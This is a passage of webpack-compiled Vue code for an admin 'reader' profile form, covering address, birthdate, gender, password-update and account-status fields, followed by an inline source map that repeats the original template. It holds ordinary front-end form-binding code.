_vm.additionalForm.state,\n expression: \"additionalForm.state\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.additionalForm.errors.has(\"state\")\n },\n attrs: {\n type: \"text\",\n name: \"state\",\n readonly: !_vm.isAdditionalUpdating\n },\n domProps: { value: _vm.additionalForm.state },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.additionalForm, \"state\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.additionalForm, field: \"state\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"ZIP/Postal Code\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.additionalForm.zip,\n expression: \"additionalForm.zip\"\n }\n ],\n staticClass: \"form-control\",\n class: { \"is-invalid\": _vm.additionalForm.errors.has(\"zip\") },\n attrs: {\n type: \"text\",\n name: \"zip\",\n readonly: !_vm.isAdditionalUpdating\n },\n domProps: { value: _vm.additionalForm.zip },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.additionalForm, \"zip\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.additionalForm, field: \"zip\" }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Country\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.additionalForm.country,\n expression: \"additionalForm.country\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.additionalForm.errors.has(\"country\")\n },\n attrs: {\n type: \"text\",\n name: \"country\",\n 
readonly: !_vm.isAdditionalUpdating\n },\n domProps: { value: _vm.additionalForm.country },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(\n _vm.additionalForm,\n \"country\",\n $event.target.value\n )\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.additionalForm, field: \"country\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto\" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Birthdate\")))]),\n _vm._v(\" \"),\n _c(\"birth-datepicker\", {\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.additionalForm.errors.has(\"birthdate\")\n },\n attrs: {\n name: \"birthdate\",\n disabled: !_vm.isAdditionalUpdating\n },\n model: {\n value: _vm.additionalForm.birthdate,\n callback: function($$v) {\n _vm.$set(_vm.additionalForm, \"birthdate\", $$v)\n },\n expression: \"additionalForm.birthdate\"\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.additionalform, field: \"birthdate\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto\" },\n [\n _c(\"label\", [_vm._v(\"Gender\")]),\n _vm._v(\" \"),\n _c(\n \"select\",\n {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.additionalForm.gender,\n expression: \"additionalForm.gender\"\n }\n ],\n staticClass: \"form-control\",\n attrs: {\n id: \"gender\",\n required: \"\",\n disabled: !_vm.isAdditionalUpdating\n },\n on: {\n change: function($event) {\n var $$selectedVal = Array.prototype.filter\n .call($event.target.options, function(o) {\n return o.selected\n })\n .map(function(o) {\n var val = \"_value\" in o ? o._value : o.value\n return val\n })\n _vm.$set(\n _vm.additionalForm,\n \"gender\",\n $event.target.multiple\n ? 
$$selectedVal\n : $$selectedVal[0]\n )\n }\n }\n },\n _vm._l(_vm.genders, function(gender) {\n return _c(\n \"option\",\n { key: gender.id, domProps: { value: gender.id } },\n [\n _vm._v(\n \"\\n \" +\n _vm._s(gender.name) +\n \"\\n \"\n )\n ]\n )\n }),\n 0\n ),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.additionalForm, field: \"gender\" }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _vm.isAdditionalUpdating\n ? _c(\n \"div\",\n { staticClass: \"form-group row col-md-4 mx-auto mt-3\" },\n [\n _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-secondary w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.cancelUpdate()\n }\n }\n },\n [_vm._v(\"\\n Cancel\\n \")]\n )\n ]),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n [\n _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n _vm._v(\"\\n Confirm\\n \")\n ])\n ],\n 1\n )\n ]\n )\n : _c(\n \"div\",\n { staticClass: \"form-group row col-md-4 mx-auto mt-3\" },\n [\n _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-secondary w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.cancelUpdate()\n }\n }\n },\n [_vm._v(\"\\n Cancel\\n \")]\n )\n ]),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n [\n _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n _vm._v(\"\\n Confirm\\n \")\n ])\n ],\n 1\n )\n ]\n )\n ])\n ]\n ),\n _vm._v(\" \"),\n _c(\"hr\", { staticClass: \" mt-5\" }),\n _vm._v(\" \"),\n _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Update Password\")]),\n _vm._v(\" \"),\n _c(\n \"form\",\n {\n on: {\n submit: function($event) {\n $event.preventDefault()\n return _vm.update($event)\n },\n keydown: function($event) {\n return 
_vm.readerForm.onKeydown($event)\n }\n }\n },\n [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"password\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.password,\n expression: \"readerForm.password\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"password\")\n },\n attrs: {\n type: \"password\",\n name: \"password\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.password },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"password\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"password\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Confirm Password\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"confirm-password\")\n },\n attrs: {\n type: \"password\",\n name: \"confirmPassword\",\n readonly: !_vm.isUpdating\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"confirmPassword\" }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Current Password\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"current-password\")\n },\n attrs: {\n type: \"password\",\n name: \"currentPassword\",\n readonly: !_vm.isUpdating\n }\n }),\n _vm._v(\" \"),\n 
_c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"currentPassword\" }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"form-group row col-md-4 mx-auto mt-3\" }, [\n _vm.isUpdating\n ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-secondary w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.cancelUpdate()\n }\n }\n },\n [_vm._v(\"\\n Cancel\\n \")]\n )\n ])\n : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-danger w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.removeAccount()\n }\n }\n },\n [_vm._v(\"\\n Remove Account\\n \")]\n )\n ]),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n [\n !_vm.isUpdating\n ? _c(\n \"button\",\n {\n staticClass: \"btn btn-primary w-100\",\n on: {\n click: function($event) {\n $event.preventDefault()\n _vm.isUpdating = true\n }\n }\n },\n [\n _vm._v(\n \"\\n \" +\n _vm._s(_vm.$t(\"update\")) +\n \"\\n \"\n )\n ]\n )\n : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n _vm._v(\"\\n Confirm\\n \")\n ])\n ],\n 1\n )\n ])\n ])\n ]\n )\n ])\n}\nvar staticRenderFns = []\nrender._withStripped = true\n\n//# sourceURL=[module]\n//# 
sourceMappingURL=data:application/json;charset=utf-8;base64,{"version":3,"sources":["webpack:///./resources/js/pages/admin/reader/reader-form.vue?9fd0"],"names":[],"mappings":"AAAA;AAAA;AAAA;AAAA;AACA;AACA;AACA;AACA,qBAAqB,0BAA0B;AAC/C,eAAe,qBAAqB;AACpC,iBAAiB,0BAA0B;AAC3C,kBAAkB,sBAAsB;AACxC;AACA,iBAAiB,sBAAsB;AACvC;AACA;AACA;AACA;AACA,iBAAiB,qCAAqC;AACtD;AACA;AACA,WAAW,4CAA4C,oBAAoB,EAAE;AAC7E;AACA;AACA;AACA;AACA;AACA;AACA;AACA,cAAc,sBAAsB;AACpC;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,WAAW;AACX;AACA;AACA;AACA;AACA,OAAO;AACP;AACA,mBAAmB,qBAAqB;AACxC,qBAAqB,0BAA0B;AAC/C;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,iCAAiC;AAC9D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,kCAAkC;AAC/D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,iCAAiC;AAC9D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,qBAAqB,0BAA0B;AAC/C;AACA;AACA,eAAe,8CAA8C;AAC7D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,0BAA0B,mDAAmD;AAC7E;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,8BAA8B;AAC3D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,qCAAqC;AAClE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;A
ACA;AACA;AACA;AACA,eAAe,mDAAmD;AAClE;AACA;AACA;AACA;AACA;AACA,0BAA0B,4BAA4B;AACtD;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,0BAA0B,4BAA4B;AACtD;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,0BAA0B,4BAA4B;AACtD;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,qBAAqB,uDAAuD;AAC5E;AACA,2BAA2B,uCAAuC;AAClE;AACA;AACA;AACA;AACA,8BAA8B,iBAAiB;AAC/C;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA;AACA,2BAA2B,uCAAuC;AAClE;AACA;AACA;AACA;AACA,8BAA8B,iBAAiB;AAC/C;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,kDAAkD;AACjE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,uBAAuB;AACvB;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,oCAAoC,uCAAuC;AAC3E;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,cAAc,uBAAuB;AACrC;AACA,cAAc,sBAAsB;AACpC;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,WAAW;AACX;AACA;AACA;AACA;AACA,OAAO;AACP;AACA,mBAAmB,qBAAqB;AACxC,qBAAqB,0BAA0B;AAC/C;AACA;AACA,eAAe,8CAA8C;AAC7D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,oCAAoC;AACjE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,kCAAkC;AAC/D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,0BAA0B,qDAAqD;AAC/E;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,gCAAgC;AAC7D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,qBAAqB,0BAA0B;AAC/C;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;
AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,oCAAoC;AACjE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,8CAA8C;AAC7D;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,8CAA8C;AAC7D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA;AACA;AACA;AACA,2BAA2B;AAC3B;AACA;AACA;AACA,2BAA2B;AAC3B;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA,uBAAuB,4BAA4B,mBAAmB,EAAE;AACxE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB,uDAAuD;AACxE;AACA,6BAA6B,uCAAuC;AACpE;AACA;AACA;AACA;AACA,gCAAgC,iBAAiB;AACjD;AACA;AACA;AACA;AACA;AACA;AACA,uBAAuB;AACvB;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB,kDAAkD;AACvE;AACA,sCAAsC,uCAAuC;AAC7E;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB,uDAAuD;AACxE;AACA,6BAA6B,uCAAuC;AACpE;AACA;AACA;AACA;AACA,gCAAgC,iBAAiB;AACjD;AACA;AACA;AACA;AACA;AACA;AACA,uBAAuB;AACvB;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB,kDAAkD;AACvE;AACA,sCAAsC,uCAAuC;AAC7E;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,cAAc,uBAAuB;AACrC;AACA,cAAc,sBAAsB;AACpC;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,WAAW;AACX;AACA;AACA;AACA;AACA,OAAO;AACP;AACA,mBAAmB,qBAAqB;AACxC,qBAAqB,0BAA0B;AAC/C;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA,mBAAmB;AACnB,6BAA6B,iCAAiC;AAC9D;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,qBAAqB,0BAA0B;AAC/C;AACA;AACA,e
AAe,wDAAwD;AACvE;AACA;AACA;AACA;AACA;AACA;AACA;AACA,mBAAmB;AACnB;AACA;AACA;AACA;AACA;AACA,iBAAiB;AACjB;AACA;AACA,0BAA0B;AAC1B,iBAAiB;AACjB;AACA;AACA;AACA;AACA;AACA,qBAAqB,sDAAsD;AAC3E;AACA,2BAA2B,uCAAuC;AAClE;AACA;AACA;AACA;AACA,8BAA8B,iBAAiB;AAC/C;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA;AACA,2BAA2B,uCAAuC;AAClE;AACA;AACA;AACA;AACA,8BAA8B,iBAAiB;AAC/C;AACA;AACA;AACA;AACA;AACA;AACA,qBAAqB;AACrB;AACA;AACA;AACA;AACA;AACA;AACA,eAAe,kDAAkD;AACjE;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,uBAAuB;AACvB;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,oCAAoC,uCAAuC;AAC3E;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA","file":"./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&.js","sourcesContent":["var render = function() {\n  var _vm = this\n  var _h = _vm.$createElement\n  var _c = _vm._self._c || _h\n  return _c(\"card\", { staticClass: \"py-3 m-4\" }, [\n    _c(\"div\", { staticClass: \"row\" }, [\n      _c(\"div\", { staticClass: \"col-md-8\" }, [\n        _c(\"h4\", { staticClass: \"mb-3\" }, [_vm._v(\"Update Reader Profile\")]),\n        _vm._v(\" \"),\n        _c(\"p\", { staticClass: \"mb-5\" }, [\n          _vm._v(\"Change personal information here.\")\n        ])\n      ]),\n      _vm._v(\" \"),\n      _c(\"div\", { staticClass: \"col-md-4 text-right\" }, [\n        _c(\n          \"button\",\n          { staticClass: \"btn btn-danger btn-lg\", on: { click: _vm.goBack } },\n          [_vm._v(\"Back\")]\n        )\n      ])\n    ]),\n    _vm._v(\" \"),\n    _c(\"hr\"),\n    _vm._v(\" \"),\n    _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Account Information\")]),\n    _vm._v(\" \"),\n    _c(\n      \"form\",\n      {\n        on: {\n          submit: function($event) {\n            $event.preventDefault()\n            return _vm.update($event)\n          },\n          keydown: function($event) {\n      
      return _vm.readerForm.onKeydown($event)\n          }\n        }\n      },\n      [\n        _c(\"div\", { staticClass: \"row\" }, [\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"username\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.username,\n                      expression: \"readerForm.username\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"username\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"username\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.username },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.readerForm, \"username\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"username\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"First Name\")))]),\n                _vm._v(\" \"),\n      
          _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.firstName,\n                      expression: \"readerForm.firstName\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"firstName\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"firstName\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.firstName },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.readerForm, \"firstName\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"firstName\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Last Name\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.lastName,\n                      expression: \"readerForm.lastName\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    
\"is-invalid\": _vm.readerForm.errors.has(\"lastName\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"lastName\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.lastName },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.readerForm, \"lastName\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"lastName\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"email\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.email,\n                      expression: \"readerForm.email\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: { \"is-invalid\": _vm.readerForm.errors.has(\"email\") },\n                  attrs: {\n                    type: \"text\",\n                    name: \"email\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.email },\n                  on: {\n                    input: function($event) {\n                      if 
($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.readerForm, \"email\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"email\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Phone Number\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.phone_number,\n                      expression: \"readerForm.phone_number\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"phone_number\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"phone_number\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.phone_number },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(\n                        _vm.readerForm,\n                        \"phone_number\",\n                        $event.target.value\n                      )\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                
  attrs: { form: _vm.readerForm, field: \"phone_number\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto ml-2\" },\n              [\n                _c(\"label\", [_vm._v(\"Banned?\")]),\n                _vm._v(\" \"),\n                _c(\"InputSwitch\", {\n                  staticClass: \"mr-2\",\n                  attrs: { disabled: !_vm.isUpdating },\n                  model: {\n                    value: _vm.sync_banned,\n                    callback: function($$v) {\n                      _vm.sync_banned = $$v\n                    },\n                    expression: \"sync_banned\"\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"label\", [_vm._v(\"Visible?\")]),\n                _vm._v(\" \"),\n                _c(\"InputSwitch\", {\n                  staticClass: \"mr-2\",\n                  attrs: { disabled: !_vm.isUpdating },\n                  model: {\n                    value: _vm.sync_visible,\n                    callback: function($$v) {\n                      _vm.sync_visible = $$v\n                    },\n                    expression: \"sync_visible\"\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"label\", [_vm._v(\"Approved?\")]),\n                _vm._v(\" \"),\n                _c(\"InputSwitch\", {\n                  staticClass: \"mr-2\",\n                  attrs: { disabled: !_vm.isUpdating },\n                  model: {\n                    value: _vm.sync_approved,\n                    callback: function($$v) {\n                      _vm.sync_approved = $$v\n                    },\n                    expression: \"sync_approved\"\n                  }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { 
